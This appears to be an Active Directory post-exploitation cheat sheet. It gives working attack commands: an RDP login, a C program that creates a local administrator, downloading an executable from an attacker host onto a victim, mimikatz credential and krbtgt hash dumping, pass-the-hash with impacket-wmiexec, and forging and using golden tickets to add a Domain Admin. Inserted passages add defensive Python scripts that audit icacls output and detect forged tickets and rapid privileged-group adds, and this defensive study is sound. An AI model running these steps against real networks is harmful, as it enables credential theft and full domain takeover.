Active Directory Post Exploitation

Access Users Remotely

Xfreerdp

xfreerdp /u:mike /p:P@ssword /d:homeserver.local /v:192.168.56.13 /w:1920 /h:1080 /fonts /smart-sizing

Gathering Info

Cmd

# Get current user's detail
whoami

# View Groups
whoami /groups

# View all users in the domain
net user

Privilege Escalation

Powershell

View Running Services

Get-CimInstance -ClassName Win32_Service | Select-Object Name,State,PathName,StartName | Where-Object {$_.State -like 'Running'}

View Start Mode of Services

Get-CimInstance -ClassName Win32_Service -Filter "Name='<service name>'" | Select-Object StartMode

Check Permissions using ICACLS

icacls "File Name/Path"
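The icacls check above is done one file at a time; when the service list is long, the practical way is to capture the icacls output for every service binary (for example, icacls over the directories the PathName column points at, redirected to a file) and let a script flag the ones a low-privilege principal can modify, since that is the misconfiguration the check is looking for. The following Python script is an added example, not code from the original page: it parses icacls output in the format shown, relying on the way icacls prints the path once and aligns every further ACE under the first one, and reports allow entries that grant Users, Authenticated Users, Everyone or INTERACTIVE any right that lets the file be changed. The embedded icacls output is constructed for the example, and the set of low-privilege principals is an assumption to adjust per environment.

```python
import re

# Constructed icacls output for three binaries (not taken from the original page).
# icacls prints the path once, followed by the first ACE on the same line, and
# aligns every further ACE under the first one; the parser relies on that alignment.
SAMPLE_ICACLS_OUTPUT = r"""C:\Vuln Svc\app.exe BUILTIN\Users:(I)(M)
                    NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Administrators:(I)(F)
C:\svc\goodsvc.exe NT AUTHORITY\SYSTEM:(I)(F)
                   BUILTIN\Administrators:(I)(F)
                   BUILTIN\Users:(I)(RX)
C:\tmp\tool.exe Everyone:(DENY)(W)
                NT AUTHORITY\Authenticated Users:(RX,W)

Successfully processed 3 files; Failed processing 0 files
"""

# Principals that any interactive user on the box belongs to (assumed list).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# icacls simple rights that allow changing the file, plus the specific rights
# that do so (write data, append data, delete, write DAC, write owner).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DE", "WDAC", "WO"}

# Fallback for a file with a single ACE (no continuation line to align on):
# the path is taken lazily and the principal may contain at most one backslash.
SINGLE_ACE_RE = re.compile(r"^(?P<path>.+?)\s+(?P<ace>(?:[^\\:]+\\)?[^\\:]+:(?:\([^()]*\))+)$")


def _file_blocks(text):
    """Group lines so each block is one file: its first line plus indented ACE lines."""
    blocks, current = [], []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("Successfully processed"):
            continue
        if raw.startswith(" "):
            current.append(raw)
        else:
            if current:
                blocks.append(current)
            current = [raw]
    if current:
        blocks.append(current)
    return blocks


def _parse_ace(ace):
    """'BUILTIN\\Users:(I)(RX,W)' -> ('BUILTIN\\Users', {'I', 'RX', 'W'})"""
    principal, flags = ace.rsplit(":", 1)
    tokens = set()
    for group in re.findall(r"\(([^()]*)\)", flags):
        tokens.update(t.strip() for t in group.split(","))
    return principal, tokens


def parse_icacls(text):
    """Return {path: [(principal, token_set), ...]} from icacls output."""
    result = {}
    for block in _file_blocks(text):
        first = block[0]
        if len(block) > 1:
            # Continuation lines are indented by len(path) + 1 spaces.
            indent = len(block[1]) - len(block[1].lstrip(" "))
            path, first_ace = first[: indent - 1], first[indent:]
        else:
            m = SINGLE_ACE_RE.match(first)
            if not m:
                continue
            path, first_ace = m.group("path"), m.group("ace")
        aces = [first_ace] + [line.strip() for line in block[1:]]
        result[path] = [_parse_ace(a) for a in aces]
    return result


def writable_by_low_priv(aces):
    """List (principal, sorted write rights) for allow ACEs that let a low-privilege principal modify the file."""
    findings = []
    for principal, tokens in aces:
        if "DENY" in tokens or principal.lower() not in LOW_PRIV_PRINCIPALS:
            continue
        granted = sorted(tokens & WRITE_RIGHTS)
        if granted:
            findings.append((principal, granted))
    return findings


def audit(text):
    """Map each binary whose ACL lets a low-privilege principal modify it to the offending ACEs."""
    report = {}
    for path, aces in parse_icacls(text).items():
        hits = writable_by_low_priv(aces)
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, hits in audit(SAMPLE_ICACLS_OUTPUT).items():
        for principal, rights in hits:
            print(f"{path}: {principal} can modify it ({','.join(rights)})")
```

On the sample, only app.exe (Users has M) and tool.exe (Authenticated Users has W) are reported; goodsvc.exe gives Users RX only, and the deny ACE for Everyone on tool.exe is ignored because it takes rights away rather than granting them. Inherited entries, marked (I), are evaluated like any other because an inherited write right is just as usable; fixing the finding usually means fixing the parent directory's ACL rather than the file's.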

C Program

Adduser.c

#include <stdio.h>
#include <stdlib.h>

/* Each system() call runs the command through cmd.exe and returns the
   command's exit status, so a non-zero result means the account or
   group change did not go through (for example, when the binary is
   not running with administrative rights). */
int main(void)
{
        int rc;

        rc = system("net user peter P@ssword /add");
        if (rc != 0) {
                fprintf(stderr, "net user failed (exit status %d)\n", rc);
                return 1;
        }

        rc = system("net localgroup administrators peter /add");
        if (rc != 0) {
                fprintf(stderr, "net localgroup failed (exit status %d)\n", rc);
                return 1;
        }

        return 0;
}

Compile

x86_64-w64-mingw32-gcc Adduser.c -o adduser.exe

Share the Exe

# Attacker Machine
python3 -m http.server

# Victim Machine
iwr -Uri http://10.10.10.10/<file.exe> -OutFile <file.exe>

Stealing Credentials

Mimikatz

# Start mimikatz
.\mimikatz.exe

# Dump hashes
privilege::debug

sekurlsa::logonpasswords

Impacket

Wmiexec

impacket-wmiexec -hashes :<NT Hash> domain/user@<IP>

# View PowerShell history (PSReadLine stores it per user under AppData\Roaming)
cd C:\users\jack\appdata\roaming\microsoft\windows\powershell\psreadline

PsExec

# Accessing the domain controller
.\PSExec64.exe \\dc01 cmd.exe

Forging Golden Tickets

Get krbtgt Hash and Domain SID

.\mimikatz.exe

privilege::debug

# Dump Hashes
lsadump::lsa /patch

Create Golden Ticket

.\mimikatz.exe

kerberos::purge

# Creating Ticket

kerberos::golden /user:<any user> /domain:homeserver.local /sid:<domain sid> /krbtgt:<krbtgt hash> /ticket:homeserver_golden

Using Golden Ticket

Powershell

.\mimikatz.exe

kerberos::ptt homeserver_golden

misc::cmd

PsExec

PsExec.exe \\dc01 cmd.exe

# Add a user to domain
net user mike P@ssword /add /domain

# Add a user to domain group
net group "domain admins" mike /add /domain
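Both the Adduser.c step earlier on this page (a new local account dropped straight into Administrators) and the finish of the golden-ticket procedure (a new domain account dropped straight into Domain Admins, after a service ticket was obtained with a forged TGT) leave a characteristic trace in the Security logs of the domain controllers and hosts involved. The Python script below is an added example, not part of the original page, that runs two such checks over a constructed set of simplified events: a 4769 service-ticket request for an account that has no preceding 4768 TGT request within the default 10-hour TGT lifetime (a golden ticket is minted offline, so the DC never issued the TGT), and an account-creation event (4720) followed within minutes by membership in a privileged group (4728 for global groups such as Domain Admins, 4732 for the local Administrators group). The event IDs are the real Windows ones; the event records, field names, account names, hosts, group list and time windows are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified Security-log events (not real telemetry). Field names are
# this example's own; real 4768/4769/4720/4728/4732 events carry these values under
# different XML field names (TargetUserName, IpAddress, ServiceName, ...).
EVENTS = [
    # Normal Kerberos flow: TGT (4768) issued, then a service ticket (4769) requested.
    {"time": "2024-05-01T10:00:05", "id": 4768, "account": "alice", "client": "10.0.0.15"},
    {"time": "2024-05-01T10:00:07", "id": 4769, "account": "alice", "client": "10.0.0.15",
     "service": "cifs/dc01"},
    # Service ticket for 'mike' with no TGT ever issued by this DC: forged-TGT indicator.
    {"time": "2024-05-01T10:20:00", "id": 4769, "account": "mike", "client": "10.0.0.99",
     "service": "cifs/dc01"},
    # Account created (4720) and added to Domain Admins (4728) within seconds.
    {"time": "2024-05-01T10:20:30", "id": 4720, "account": "mike", "subject": "Administrator"},
    {"time": "2024-05-01T10:20:40", "id": 4728, "account": "mike", "group": "Domain Admins",
     "subject": "Administrator"},
    # Benign provisioning: account created in the morning, low-impact group hours later.
    {"time": "2024-05-01T09:00:00", "id": 4720, "account": "svc_backup", "subject": "helpdesk1"},
    {"time": "2024-05-01T15:00:00", "id": 4728, "account": "svc_backup", "group": "Backup Operators",
     "subject": "helpdesk1"},
]

# Groups whose membership grants control of the domain or the host (assumed list).
PRIVILEGED_GROUPS = {"domain admins", "administrators", "enterprise admins"}


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect_tgs_without_tgt(events, window=timedelta(hours=10)):
    """Flag 4769 requests whose account has no 4768 in the preceding window.

    A golden ticket is minted offline, so the DC never logs a 4768 for it; the
    default maximum TGT lifetime of 10 hours bounds how far back a genuine TGT
    could have been issued.
    """
    tgt_times = defaultdict(list)
    for e in events:
        if e["id"] == 4768:
            tgt_times[e["account"].lower()].append(_ts(e))
    alerts = []
    for e in sorted(events, key=_ts):
        if e["id"] != 4769:
            continue
        t = _ts(e)
        if not any(t - window <= issued <= t for issued in tgt_times[e["account"].lower()]):
            alerts.append((e["account"], e["client"], e["service"]))
    return alerts


def detect_rapid_privileged_add(events, window=timedelta(minutes=5)):
    """Flag accounts created (4720) and added to a privileged group (4728/4732) within the window."""
    created = {}
    for e in events:
        if e["id"] == 4720:
            created[e["account"].lower()] = _ts(e)
    alerts = []
    for e in sorted(events, key=_ts):
        if e["id"] not in (4728, 4732) or e["group"].lower() not in PRIVILEGED_GROUPS:
            continue
        t0 = created.get(e["account"].lower())
        if t0 is not None and timedelta(0) <= _ts(e) - t0 <= window:
            alerts.append((e["account"], e["group"], e["subject"]))
    return alerts


if __name__ == "__main__":
    for account, client, service in detect_tgs_without_tgt(EVENTS):
        print(f"TGS for {service} by {account} from {client} with no TGT in the last 10h")
    for account, group, subject in detect_rapid_privileged_add(EVENTS):
        print(f"{subject} created {account} and added it to {group} within 5 minutes")
```

Two caveats matter when running this against real logs. In a domain with several domain controllers the 4768 may be logged on a different DC from the 4769, so the TGT check only works on logs aggregated across all DCs. The golden ticket can also name an account that does not exist at all (/user:<any user> above); the same check catches it, since no DC will ever have a 4768 for that name, and the user name in the 4769 will not match any account object.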
